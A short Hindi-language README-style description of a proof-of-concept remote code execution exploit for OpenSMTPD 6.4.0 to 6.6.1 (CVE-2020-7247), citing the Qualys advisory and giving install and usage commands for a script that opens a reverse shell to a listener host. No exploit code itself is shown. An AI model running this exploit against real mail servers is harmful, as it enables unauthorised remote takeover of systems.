
OpenSMTPD संस्करण 6.4.0 से 6.6.1 को लक्षित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट रिमोट कोड निष्पादन एक्सप्लॉइट, जो क्राफ्टेड SMTP कमांड के माध्यम से रिवर्स शेल प्रदान करता है।
OpenSMTPD 6.4.0 < 6.6.1 के लिए PoC एक्सप्लॉइट - दूरस्थ कोड निष्पादन, f4T1H द्वारा लिखित, QTranspose से प्रेरित।
संदर्भ: https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
pip3 install pwntools
python3 exploit.py <RHOST> <RPORT> <recipient_mail> <LHOST> <LPORT>
